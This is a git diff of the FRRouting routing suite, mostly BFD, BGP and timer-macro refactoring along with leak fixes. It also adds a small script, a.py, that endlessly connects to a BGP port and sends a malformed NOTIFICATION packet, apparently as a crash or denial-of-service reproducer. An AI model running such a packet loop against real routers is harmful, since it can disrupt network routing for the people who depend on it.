summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--a.py22
-rw-r--r--bfdd/bfd.c66
-rw-r--r--bfdd/bfd_packet.c47
-rw-r--r--bgpd/bgp_advertise.c24
-rw-r--r--bgpd/bgp_advertise.h15
-rw-r--r--bgpd/bgp_aspath.c22
-rw-r--r--bgpd/bgp_aspath.h1
-rw-r--r--bgpd/bgp_bmp.c20
-rw-r--r--bgpd/bgp_damp.c2
-rw-r--r--bgpd/bgp_dump.c2
-rw-r--r--bgpd/bgp_evpn.c2
-rw-r--r--bgpd/bgp_evpn_mh.c2
-rw-r--r--bgpd/bgp_filter.c4
-rw-r--r--bgpd/bgp_fsm.c145
-rw-r--r--bgpd/bgp_fsm.h5
-rw-r--r--bgpd/bgp_io.c6
-rw-r--r--bgpd/bgp_keepalives.c6
-rw-r--r--bgpd/bgp_mplsvpn.c18
-rw-r--r--bgpd/bgp_mplsvpn.h17
-rw-r--r--bgpd/bgp_network.c4
-rw-r--r--bgpd/bgp_nexthop.c15
-rw-r--r--bgpd/bgp_nexthop.h6
-rw-r--r--bgpd/bgp_nht.c114
-rw-r--r--bgpd/bgp_packet.c19
-rw-r--r--bgpd/bgp_route.c45
-rw-r--r--bgpd/bgp_updgrp.c10
-rw-r--r--bgpd/bgp_updgrp_adv.c175
-rw-r--r--bgpd/bgp_vty.c145
-rw-r--r--bgpd/bgp_vty.h16
-rw-r--r--bgpd/bgp_zebra.c5
-rw-r--r--bgpd/bgpd.c37
-rw-r--r--bgpd/bgpd.h3
-rw-r--r--bgpd/rfapi/rfapi.c11
-rw-r--r--bgpd/rfapi/rfapi_ap.c1
-rw-r--r--bgpd/rfapi/rfapi_encap_tlv.c1
-rw-r--r--bgpd/rfapi/rfapi_import.c65
-rw-r--r--bgpd/rfapi/rfapi_monitor.c52
-rw-r--r--bgpd/rfapi/rfapi_rib.c28
-rw-r--r--bgpd/rfapi/rfapi_vty.c90
-rw-r--r--bgpd/rfapi/vnc_export_bgp.c9
-rw-r--r--bgpd/rfapi/vnc_export_table.c1
-rw-r--r--bgpd/rfapi/vnc_zebra.c2
-rw-r--r--debian/changelog12
-rw-r--r--doc/developer/locking.rst4
-rw-r--r--doc/developer/rcu.rst2
-rw-r--r--doc/developer/topotests.rst6
-rw-r--r--doc/user/bgp.rst8
-rw-r--r--doc/user/pimv6.rst4
-rw-r--r--isisd/fabricd.c14
-rw-r--r--isisd/isis_adjacency.c4
-rw-r--r--isisd/isis_circuit.c24
-rw-r--r--isisd/isis_cli.c4
-rw-r--r--isisd/isis_dr.c10
-rw-r--r--isisd/isis_dynhn.c2
-rw-r--r--isisd/isis_events.c10
-rw-r--r--isisd/isis_lfa.c4
-rw-r--r--isisd/isis_lsp.c8
-rw-r--r--isisd/isis_pdu.c6
-rw-r--r--isisd/isis_spf.c2
-rw-r--r--isisd/isis_sr.c2
-rw-r--r--isisd/isis_tlvs.c8
-rw-r--r--isisd/isis_tx_queue.c6
-rw-r--r--isisd/isisd.c16
-rw-r--r--ldpd/accept.c6
-rw-r--r--ldpd/adjacency.c10
-rw-r--r--ldpd/control.c4
-rw-r--r--ldpd/interface.c9
-rw-r--r--ldpd/lde.c8
-rw-r--r--ldpd/lde_lib.c4
-rw-r--r--ldpd/ldpd.c14
-rw-r--r--ldpd/ldpe.c14
-rw-r--r--ldpd/neighbor.c25
-rw-r--r--ldpd/packet.c6
-rw-r--r--lib/agentx.c5
-rw-r--r--lib/ferr.c10
-rw-r--r--lib/frr_pthread.c14
-rw-r--r--lib/hash.c4
-rw-r--r--lib/log_filter.c10
-rw-r--r--lib/northbound_grpc.cpp2
-rw-r--r--lib/privs.c4
-rw-r--r--lib/stream.c8
-rw-r--r--lib/thread.c49
-rw-r--r--lib/zlog_targets.c16
-rw-r--r--ospf6d/ospf6_gr_helper.c2
-rw-r--r--ospfclient/ospf_apiclient.c6
-rw-r--r--ospfd/ospf_apiserver.c8
-rw-r--r--ospfd/ospf_gr.c2
-rw-r--r--ospfd/ospf_interface.c8
-rw-r--r--ospfd/ospf_ism.c22
-rw-r--r--ospfd/ospf_ism.h3
-rw-r--r--ospfd/ospf_lsa.c10
-rw-r--r--ospfd/ospf_neighbor.c12
-rw-r--r--ospfd/ospf_nsm.c26
-rw-r--r--ospfd/ospf_nsm.h3
-rw-r--r--ospfd/ospf_opaque.c10
-rw-r--r--ospfd/ospf_packet.c4
-rw-r--r--ospfd/ospf_vty.c2
-rw-r--r--ospfd/ospfd.c52
-rw-r--r--ospfd/ospfd.h2
-rw-r--r--pathd/path_zebra.c6
-rw-r--r--pathd/path_zebra.h1
-rw-r--r--pathd/pathd.c2
-rw-r--r--pimd/mtracebis_netlink.c21
-rw-r--r--pimd/pim6_cmd.c20
-rw-r--r--pimd/pim_cmd.c20
-rw-r--r--pimd/pim_cmd_common.c10
-rw-r--r--pimd/pim_cmd_common.h1
-rw-r--r--pimd/pim_iface.c25
-rw-r--r--pimd/pim_nht.c2
-rw-r--r--redhat/frr.spec.in123
-rw-r--r--ripd/rip_interface.c2
-rw-r--r--ripd/rip_nb_rpcs.c4
-rw-r--r--ripd/rip_peer.c4
-rw-r--r--ripd/ripd.c46
-rw-r--r--ripd/ripd.h3
-rw-r--r--ripngd/ripng_interface.c2
-rw-r--r--ripngd/ripng_nb_rpcs.c4
-rw-r--r--ripngd/ripng_peer.c4
-rw-r--r--ripngd/ripngd.c42
-rw-r--r--ripngd/ripngd.h2
-rw-r--r--tests/topotests/bfd_vrflite_topo1/__init__.py0
-rw-r--r--tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json96
-rw-r--r--tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf26
-rw-r--r--tests/topotests/bfd_vrflite_topo1/r1/zebra.conf24
-rw-r--r--tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf26
-rw-r--r--tests/topotests/bfd_vrflite_topo1/r2/zebra.conf24
-rw-r--r--tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py153
-rw-r--r--tests/topotests/bgp_as_override/__init__.py0
-rw-r--r--tests/topotests/bgp_as_override/r1/bgpd.conf10
-rw-r--r--tests/topotests/bgp_as_override/r1/zebra.conf9
-rw-r--r--tests/topotests/bgp_as_override/r2/bgpd.conf10
-rw-r--r--tests/topotests/bgp_as_override/r2/zebra.conf9
-rw-r--r--tests/topotests/bgp_as_override/r3/bgpd.conf13
-rw-r--r--tests/topotests/bgp_as_override/r3/zebra.conf9
-rw-r--r--tests/topotests/bgp_as_override/r4/bgpd.conf7
-rw-r--r--tests/topotests/bgp_as_override/r4/zebra.conf6
-rw-r--r--tests/topotests/bgp_as_override/test_bgp_as_override.py122
-rw-r--r--tests/topotests/bgp_default_originate/bgp_default_originate_2links.json136
-rw-r--r--tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py1414
-rw-r--r--tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py2
-rw-r--r--tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py2
-rw-r--r--tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py3
-rw-r--r--tests/topotests/bgp_default_originate/test_default_orginate_vrf.py2
-rw-r--r--tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py2
-rw-r--r--tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf2
-rw-r--r--tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py3
-rw-r--r--tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py2
-rw-r--r--tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py2
-rw-r--r--tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py3
-rw-r--r--tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py1
-rwxr-xr-xtests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py13
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/__init__.py0
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf24
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json69
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json94
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf14
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf13
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf35
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf14
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf16
-rw-r--r--tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py201
-rw-r--r--tests/topotests/lib/common_config.py90
-rw-r--r--tests/topotests/lib/micronet.py54
-rw-r--r--tests/topotests/lib/pim.py439
-rw-r--r--tests/topotests/lib/topogen.py6
-rw-r--r--tests/topotests/lib/topojson.py11
-rw-r--r--tests/topotests/lib/topotest.py1
-rw-r--r--tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json197
-rwxr-xr-xtests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py414
-rw-r--r--tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py2
-rw-r--r--tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py2
-rw-r--r--tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py2
-rw-r--r--tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py1
-rw-r--r--tools/gcc-plugins/frr-format.c2
-rw-r--r--tools/gcc-plugins/gcc-common.h5
-rw-r--r--vrrpd/vrrp.c6
-rw-r--r--vtysh/vtysh.c68
-rw-r--r--zebra/irdp_main.c4
-rw-r--r--zebra/kernel_netlink.c2
-rw-r--r--zebra/rt_netlink.c8
-rw-r--r--zebra/rtadv.c14
-rw-r--r--zebra/zebra_dplane.c4
-rw-r--r--zebra/zebra_evpn_mac.c5
-rw-r--r--zebra/zebra_fpm.c10
-rw-r--r--zebra/zebra_mpls.c38
-rw-r--r--zebra/zebra_netns_notify.c2
-rw-r--r--zebra/zebra_opaque.c4
-rw-r--r--zebra/zebra_ptm.c8
-rw-r--r--zebra/zebra_pw.c4
-rw-r--r--zebra/zebra_rib.c4
-rw-r--r--zebra/zserv.c22
191 files changed, 5133 insertions, 1081 deletions
diff --git a/a.py b/a.py
new file mode 100644
index 0000000000..5b0fb679ff
--- /dev/null
+++ b/a.py
@@ -0,0 +1,22 @@
+import socket
+from time import sleep
+
+bgp_open = b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00#\x01\x04\x00\x02\x00\x05\xac\x11\x00\x01\xff\xff\x00\x03\x00\x01\x00'
+bgp_keepalive = b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04'
+bgp_notification = b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x15\x04xv'
+
+while True:
+ try:
+ print("[+] Creating socket...")
+ s = socket.socket(type=socket.SOCK_STREAM)
+ print("[+] Connecting to server...")
+ s.connect(('172.17.0.3', 179))
+ s.send(bgp_open)
+ sleep(0.0009999999)
+ s.send(bgp_keepalive)
+ s.send(bgp_notification)
+ except KeyboardInterrupt:
+ s.close()
+ break
+ except:
+ s.close()
diff --git a/bfdd/bfd.c b/bfdd/bfd.c
index 483beb1b17..a161926358 100644
--- a/bfdd/bfd.c
+++ b/bfdd/bfd.c
@@ -1950,40 +1950,38 @@ static int bfd_vrf_enable(struct vrf *vrf)
if (bglobal.debug_zebra)
zlog_debug("VRF enable add %s id %u", vrf->name, vrf->vrf_id);
- if (vrf->vrf_id == VRF_DEFAULT ||
- vrf_get_backend() == VRF_BACKEND_NETNS) {
- if (!bvrf->bg_shop)
- bvrf->bg_shop = bp_udp_shop(vrf);
- if (!bvrf->bg_mhop)
- bvrf->bg_mhop = bp_udp_mhop(vrf);
- if (!bvrf->bg_shop6)
- bvrf->bg_shop6 = bp_udp6_shop(vrf);
- if (!bvrf->bg_mhop6)
- bvrf->bg_mhop6 = bp_udp6_mhop(vrf);
- if (!bvrf->bg_echo)
- bvrf->bg_echo = bp_echo_socket(vrf);
- if (!bvrf->bg_echov6)
- bvrf->bg_echov6 = bp_echov6_socket(vrf);
-
- if (!bvrf->bg_ev[0] && bvrf->bg_shop != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_shop, &bvrf->bg_ev[0]);
- if (!bvrf->bg_ev[1] && bvrf->bg_mhop != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_mhop, &bvrf->bg_ev[1]);
- if (!bvrf->bg_ev[2] && bvrf->bg_shop6 != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_shop6, &bvrf->bg_ev[2]);
- if (!bvrf->bg_ev[3] && bvrf->bg_mhop6 != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_mhop6, &bvrf->bg_ev[3]);
- if (!bvrf->bg_ev[4] && bvrf->bg_echo != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_echo, &bvrf->bg_ev[4]);
- if (!bvrf->bg_ev[5] && bvrf->bg_echov6 != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_echov6, &bvrf->bg_ev[5]);
- }
+ if (!bvrf->bg_shop)
+ bvrf->bg_shop = bp_udp_shop(vrf);
+ if (!bvrf->bg_mhop)
+ bvrf->bg_mhop = bp_udp_mhop(vrf);
+ if (!bvrf->bg_shop6)
+ bvrf->bg_shop6 = bp_udp6_shop(vrf);
+ if (!bvrf->bg_mhop6)
+ bvrf->bg_mhop6 = bp_udp6_mhop(vrf);
+ if (!bvrf->bg_echo)
+ bvrf->bg_echo = bp_echo_socket(vrf);
+ if (!bvrf->bg_echov6)
+ bvrf->bg_echov6 = bp_echov6_socket(vrf);
+
+ if (!bvrf->bg_ev[0] && bvrf->bg_shop != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_shop,
+ &bvrf->bg_ev[0]);
+ if (!bvrf->bg_ev[1] && bvrf->bg_mhop != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_mhop,
+ &bvrf->bg_ev[1]);
+ if (!bvrf->bg_ev[2] && bvrf->bg_shop6 != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_shop6,
+ &bvrf->bg_ev[2]);
+ if (!bvrf->bg_ev[3] && bvrf->bg_mhop6 != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_mhop6,
+ &bvrf->bg_ev[3]);
+ if (!bvrf->bg_ev[4] && bvrf->bg_echo != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_echo,
+ &bvrf->bg_ev[4]);
+ if (!bvrf->bg_ev[5] && bvrf->bg_echov6 != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_echov6,
+ &bvrf->bg_ev[5]);
+
if (vrf->vrf_id != VRF_DEFAULT) {
bfdd_zclient_register(vrf->vrf_id);
bfdd_sessions_enable_vrf(vrf);
diff --git a/bfdd/bfd_packet.c b/bfdd/bfd_packet.c
index d34d642762..82b3f09b0c 100644
--- a/bfdd/bfd_packet.c
+++ b/bfdd/bfd_packet.c
@@ -876,6 +876,14 @@ void bfd_recv_cb(struct thread *t)
"no session found");
return;
}
+ /*
+ * We may have a situation where received packet is on wrong vrf
+ */
+ if (bfd && bfd->vrf && bfd->vrf != bvrf->vrf) {
+ cp_debug(is_mhop, &peer, &local, ifindex, vrfid,
+ "wrong vrfid.");
+ return;
+ }
/* Ensure that existing good sessions are not overridden. */
if (!cp->discrs.remote_discr && bfd->ses_state != PTM_BFD_DOWN &&
@@ -1208,10 +1216,41 @@ int bp_set_tos(int sd, uint8_t value)
return 0;
}
+static bool bp_set_reuse_addr(int sd)
+{
+ int one = 1;
+
+ if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)) == -1) {
+ zlog_warn("set-reuse-addr: setsockopt(SO_REUSEADDR, %d): %s",
+ one, strerror(errno));
+ return false;
+ }
+ return true;
+}
+
+static bool bp_set_reuse_port(int sd)
+{
+ int one = 1;
+
+ if (setsockopt(sd, SOL_SOCKET, SO_REUSEPORT, &one, sizeof(one)) == -1) {
+ zlog_warn("set-reuse-port: setsockopt(SO_REUSEPORT, %d): %s",
+ one, strerror(errno));
+ return false;
+ }
+ return true;
+}
+
+
static void bp_set_ipopts(int sd)
{
int rcvttl = BFD_RCV_TTL_VAL;
+ if (!bp_set_reuse_addr(sd))
+ zlog_fatal("set-reuse-addr: failed");
+
+ if (!bp_set_reuse_port(sd))
+ zlog_fatal("set-reuse-port: failed");
+
if (bp_set_ttl(sd, BFD_TTL_VAL) != 0)
zlog_fatal("set-ipopts: TTL configuration failed");
@@ -1453,6 +1492,12 @@ static void bp_set_ipv6opts(int sd)
int ipv6_pktinfo = BFD_IPV6_PKT_INFO_VAL;
int ipv6_only = BFD_IPV6_ONLY_VAL;
+ if (!bp_set_reuse_addr(sd))
+ zlog_fatal("set-reuse-addr: failed");
+
+ if (!bp_set_reuse_port(sd))
+ zlog_fatal("set-reuse-port: failed");
+
if (bp_set_ttlv6(sd, BFD_TTL_VAL) == -1)
zlog_fatal(
"set-ipv6opts: setsockopt(IPV6_UNICAST_HOPS, %d): %s",
@@ -1573,7 +1618,7 @@ int bp_echo_socket(const struct vrf *vrf)
return -1;
}
-
+ memset(&sll, 0, sizeof(sll));
sll.sll_family = AF_PACKET;
sll.sll_protocol = htons(ETH_P_IP);
sll.sll_ifindex = 0;
diff --git a/bgpd/bgp_advertise.c b/bgpd/bgp_advertise.c
index 34776bd6db..cfbb29df1c 100644
--- a/bgpd/bgp_advertise.c
+++ b/bgpd/bgp_advertise.c
@@ -43,35 +43,35 @@
/* BGP advertise attribute is used for pack same attribute update into
one packet. To do that we maintain attribute hash in struct
peer. */
-struct bgp_advertise_attr *baa_new(void)
+struct bgp_advertise_attr *bgp_advertise_attr_new(void)
{
return XCALLOC(MTYPE_BGP_ADVERTISE_ATTR,
sizeof(struct bgp_advertise_attr));
}
-static void baa_free(struct bgp_advertise_attr *baa)
+void bgp_advertise_attr_free(struct bgp_advertise_attr *baa)
{
XFREE(MTYPE_BGP_ADVERTISE_ATTR, baa);
}
-static void *baa_hash_alloc(void *p)
+static void *bgp_advertise_attr_hash_alloc(void *p)
{
struct bgp_advertise_attr *ref = (struct bgp_advertise_attr *)p;
struct bgp_advertise_attr *baa;
- baa = baa_new();
+ baa = bgp_advertise_attr_new();
baa->attr = ref->attr;
return baa;
}
-unsigned int baa_hash_key(const void *p)
+unsigned int bgp_advertise_attr_hash_key(const void *p)
{
const struct bgp_advertise_attr *baa = p;
return attrhash_key_make(baa->attr);
}
-bool baa_hash_cmp(const void *p1, const void *p2)
+bool bgp_advertise_attr_hash_cmp(const void *p1, const void *p2)
{
const struct bgp_advertise_attr *baa1 = p1;
const struct bgp_advertise_attr *baa2 = p2;
@@ -115,20 +115,22 @@ void bgp_advertise_delete(struct bgp_advertise_attr *baa,
baa->adv = adv->next;
}
-struct bgp_advertise_attr *bgp_advertise_intern(struct hash *hash,
- struct attr *attr)
+struct bgp_advertise_attr *bgp_advertise_attr_intern(struct hash *hash,
+ struct attr *attr)
{
struct bgp_advertise_attr ref;
struct bgp_advertise_attr *baa;
ref.attr = bgp_attr_intern(attr);
- baa = (struct bgp_advertise_attr *)hash_get(hash, &ref, baa_hash_alloc);
+ baa = (struct bgp_advertise_attr *)hash_get(
+ hash, &ref, bgp_advertise_attr_hash_alloc);
baa->refcnt++;
return baa;
}
-void bgp_advertise_unintern(struct hash *hash, struct bgp_advertise_attr *baa)
+void bgp_advertise_attr_unintern(struct hash *hash,
+ struct bgp_advertise_attr *baa)
{
if (baa->refcnt)
baa->refcnt--;
@@ -140,7 +142,7 @@ void bgp_advertise_unintern(struct hash *hash, struct bgp_advertise_attr *baa)
hash_release(hash, baa);
bgp_attr_unintern(&baa->attr);
}
- baa_free(baa);
+ bgp_advertise_attr_free(baa);
}
}
diff --git a/bgpd/bgp_advertise.h b/bgpd/bgp_advertise.h
index 4b032ba9c6..70294c2d89 100644
--- a/bgpd/bgp_advertise.h
+++ b/bgpd/bgp_advertise.h
@@ -152,18 +152,19 @@ extern void bgp_adj_in_remove(struct bgp_dest *dest, struct bgp_adj_in *bai);
extern void bgp_sync_init(struct peer *peer);
extern void bgp_sync_delete(struct peer *peer);
-extern unsigned int baa_hash_key(const void *p);
-extern bool baa_hash_cmp(const void *p1, const void *p2);
+extern unsigned int bgp_advertise_attr_hash_key(const void *p);
+extern bool bgp_advertise_attr_hash_cmp(const void *p1, const void *p2);
extern void bgp_advertise_add(struct bgp_advertise_attr *baa,
struct bgp_advertise *adv);
extern struct bgp_advertise *bgp_advertise_new(void);
extern void bgp_advertise_free(struct bgp_advertise *adv);
-extern struct bgp_advertise_attr *bgp_advertise_intern(struct hash *hash,
- struct attr *attr);
-extern struct bgp_advertise_attr *baa_new(void);
+extern struct bgp_advertise_attr *bgp_advertise_attr_intern(struct hash *hash,
+ struct attr *attr);
+extern struct bgp_advertise_attr *bgp_advertise_attr_new(void);
extern void bgp_advertise_delete(struct bgp_advertise_attr *baa,
struct bgp_advertise *adv);
-extern void bgp_advertise_unintern(struct hash *hash,
- struct bgp_advertise_attr *baa);
+extern void bgp_advertise_attr_unintern(struct hash *hash,
+ struct bgp_advertise_attr *baa);
+extern void bgp_advertise_attr_free(struct bgp_advertise_attr *baa);
#endif /* _QUAGGA_BGP_ADVERTISE_H */
diff --git a/bgpd/bgp_aspath.c b/bgpd/bgp_aspath.c
index 39886337f3..06f6073781 100644
--- a/bgpd/bgp_aspath.c
+++ b/bgpd/bgp_aspath.c
@@ -1209,28 +1209,6 @@ bool aspath_private_as_check(struct aspath *aspath)
return true;
}
-/* Return True if the entire ASPATH consist of the specified ASN */
-bool aspath_single_asn_check(struct aspath *aspath, as_t asn)
-{
- struct assegment *seg;
-
- if (!(aspath && aspath->segments))
- return false;
-
- seg = aspath->segments;
-
- while (seg) {
- int i;
-
- for (i = 0; i < seg->length; i++) {
- if (seg->as[i] != asn)
- return false;
- }
- seg = seg->next;
- }
- return true;
-}
-
/* Replace all instances of the target ASN with our own ASN */
struct aspath *aspath_replace_specific_asn(struct aspath *aspath,
as_t target_asn, as_t our_asn)
diff --git a/bgpd/bgp_aspath.h b/bgpd/bgp_aspath.h
index 5caab73c4d..0b58e1adc4 100644
--- a/bgpd/bgp_aspath.h
+++ b/bgpd/bgp_aspath.h
@@ -112,7 +112,6 @@ extern unsigned int aspath_get_first_as(struct aspath *aspath);
extern unsigned int aspath_get_last_as(struct aspath *aspath);
extern int aspath_loop_check(struct aspath *aspath, as_t asno);
extern bool aspath_private_as_check(struct aspath *aspath);
-extern bool aspath_single_asn_check(struct aspath *aspath, as_t asn);
extern struct aspath *aspath_replace_specific_asn(struct aspath *aspath,
as_t target_asn,
as_t our_asn);
diff --git a/bgpd/bgp_bmp.c b/bgpd/bgp_bmp.c
index 2b6e1c8ad3..bcab4099c0 100644
--- a/bgpd/bgp_bmp.c
+++ b/bgpd/bgp_bmp.c
@@ -992,7 +992,7 @@ afibreak:
}
struct bgp_table *table = bmp->targets->bgp->rib[afi][safi];
- struct bgp_dest *bn;
+ struct bgp_dest *bn = NULL;
struct bgp_path_info *bpi = NULL, *bpiter;
struct bgp_adj_in *adjin = NULL, *adjiter;
@@ -1120,6 +1120,9 @@ afibreak:
bmp_monitor(bmp, adjin->peer, 0, bn_p, prd, adjin->attr, afi,
safi, adjin->uptime);
+ if (bn)
+ bgp_dest_unlock_node(bn);
+
return true;
}
@@ -1145,7 +1148,7 @@ static bool bmp_wrqueue(struct bmp *bmp, struct pullwr *pullwr)
{
struct bmp_queue_entry *bqe;
struct peer *peer;
- struct bgp_dest *bn;
+ struct bgp_dest *bn = NULL;
bool written = false;
bqe = bmp_pull(bmp);
@@ -1222,6 +1225,10 @@ static bool bmp_wrqueue(struct bmp *bmp, struct pullwr *pullwr)
out:
if (!bqe->refcount)
XFREE(MTYPE_BMP_QUEUE, bqe);
+
+ if (bn)
+ bgp_dest_unlock_node(bn);
+
return written;
}
@@ -2217,8 +2224,13 @@ DEFPY(bmp_monitor_cfg,
NO_STR
BMP_STR
"Send BMP route monitoring messages\n"
- "Address Family\nAddress Family\nAddress Family\n"
- "Address Family\nAddress Family\nAddress Family\nAddress Family\n"
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
"Send state before policy and filter processing\n"
"Send state with policy and filters applied\n")
{
diff --git a/bgpd/bgp_damp.c b/bgpd/bgp_damp.c
index 62e8e71aa0..9acbaf7733 100644
--- a/bgpd/bgp_damp.c
+++ b/bgpd/bgp_damp.c
@@ -465,7 +465,7 @@ int bgp_damp_disable(struct bgp *bgp, afi_t afi, safi_t safi)
return 0;
/* Cancel reuse event. */
- thread_cancel(&(bdc->t_reuse));
+ THREAD_OFF(bdc->t_reuse);
/* Clean BGP dampening information. */
bgp_damp_info_clean(afi, safi);
diff --git a/bgpd/bgp_dump.c b/bgpd/bgp_dump.c
index e57f449f78..720925b20f 100644
--- a/bgpd/bgp_dump.c
+++ b/bgpd/bgp_dump.c
@@ -702,7 +702,7 @@ static int bgp_dump_unset(struct bgp_dump *bgp_dump)
}
/* Removing interval event. */
- thread_cancel(&bgp_dump->t_interval);
+ THREAD_OFF(bgp_dump->t_interval);
bgp_dump->interval = 0;
diff --git a/bgpd/bgp_evpn.c b/bgpd/bgp_evpn.c
index bbbe538acc..395111e1d2 100644
--- a/bgpd/bgp_evpn.c
+++ b/bgpd/bgp_evpn.c
@@ -6428,7 +6428,7 @@ static void bgp_evpn_remote_ip_process_nexthops(struct bgpevpn *vpn,
return;
tree = &vpn->bgp_vrf->nexthop_cache_table[afi];
- bnc = bnc_find(tree, &p, 0);
+ bnc = bnc_find(tree, &p, 0, 0);
if (!bnc || !bnc->is_evpn_gwip_nexthop)
return;
diff --git a/bgpd/bgp_evpn_mh.c b/bgpd/bgp_evpn_mh.c
index b42296f4de..3f801f7ea0 100644
--- a/bgpd/bgp_evpn_mh.c
+++ b/bgpd/bgp_evpn_mh.c
@@ -4952,7 +4952,7 @@ void bgp_evpn_mh_finish(void)
bgp_evpn_es_local_info_clear(es, true);
}
if (bgp_mh_info->t_cons_check)
- thread_cancel(&bgp_mh_info->t_cons_check);
+ THREAD_OFF(bgp_mh_info->t_cons_check);
list_delete(&bgp_mh_info->local_es_list);
list_delete(&bgp_mh_info->pend_es_list);
list_delete(&bgp_mh_info->ead_es_export_rtl);
diff --git a/bgpd/bgp_filter.c b/bgpd/bgp_filter.c
index fc9fc1e523..8921622953 100644
--- a/bgpd/bgp_filter.c
+++ b/bgpd/bgp_filter.c
@@ -189,7 +189,7 @@ static void as_list_filter_add(struct as_list *aslist,
replace = bgp_aslist_seq_check(aslist, asfilter->seq);
if (replace) {
as_filter_entry_replace(aslist, replace, asfilter);
- return;
+ goto hook;
}
/* Check insert point. */
@@ -218,6 +218,7 @@ static void as_list_filter_add(struct as_list *aslist,
aslist->tail = asfilter;
}
+hook:
/* Run hook function. */
if (as_list_master.add_hook)
(*as_list_master.add_hook)(aslist->name);
@@ -484,6 +485,7 @@ DEFUN(as_path, bgp_as_path_cmd,
if (!config_bgp_aspath_validate(regstr)) {
vty_out(vty, "Invalid character in as-path access-list %s\n",
regstr);
+ XFREE(MTYPE_TMP, regstr);
return CMD_WARNING_CONFIG_FAILED;
}
diff --git a/bgpd/bgp_fsm.c b/bgpd/bgp_fsm.c
index b034437a18..b570c84d8b 100644
--- a/bgpd/bgp_fsm.c
+++ b/bgpd/bgp_fsm.c
@@ -177,24 +177,24 @@ static struct peer *peer_xfer_conn(struct peer *from_peer)
*/
bgp_keepalives_off(from_peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_delayopen);
- BGP_TIMER_OFF(peer->t_connect_check_r);
- BGP_TIMER_OFF(peer->t_connect_check_w);
- BGP_TIMER_OFF(from_peer->t_routeadv);
- BGP_TIMER_OFF(from_peer->t_connect);
- BGP_TIMER_OFF(from_peer->t_delayopen);
- BGP_TIMER_OFF(from_peer->t_connect_check_r);
- BGP_TIMER_OFF(from_peer->t_connect_check_w);
- BGP_TIMER_OFF(from_peer->t_process_packet);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_connect_check_r);
+ THREAD_OFF(peer->t_connect_check_w);
+ THREAD_OFF(from_peer->t_routeadv);
+ THREAD_OFF(from_peer->t_connect);
+ THREAD_OFF(from_peer->t_delayopen);
+ THREAD_OFF(from_peer->t_connect_check_r);
+ THREAD_OFF(from_peer->t_connect_check_w);
+ THREAD_OFF(from_peer->t_process_packet);
/*
* At this point in time, it is possible that there are packets pending
* on various buffers. Those need to be transferred or dropped,
* otherwise we'll get spurious failures during session establishment.
*/
- frr_with_mutex(&peer->io_mtx, &from_peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx, &from_peer->io_mtx) {
fd = peer->fd;
peer->fd = from_peer->fd;
from_peer->fd = fd;
